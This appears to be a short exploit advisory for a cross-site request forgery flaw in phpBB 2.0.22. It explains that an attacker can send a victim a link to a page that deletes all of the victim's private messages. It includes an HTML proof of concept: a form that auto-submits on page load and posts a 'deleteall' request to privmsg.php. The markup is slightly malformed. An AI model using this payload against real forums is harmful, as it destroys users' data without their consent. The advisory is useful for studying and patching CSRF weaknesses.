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phpBB 2.0.22 Remote PM Delete XSRF Vulnerability

phpBB 2.0.22 Remote PM Delete XSRF Vulnerability               
by NBBN                        Type: Cross-Site Request Forgery
Founded: December 2007                                         

An attacker can send a link via pm to a site with the follow html code to a 
victim and all victim's pm's are going to be deleted when he click the link. 
  <body onLoad=javascript:document.xsrf.submit()>

<form action="http://[site]/phpBB2/privmsg.php?folder=inbox"; method="post" 
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">


######Vuln Versions:#####################

I've tested it only on 2.0.22 but I think that all versions of 2 are vuln. 

(Sorry my bad english :-) )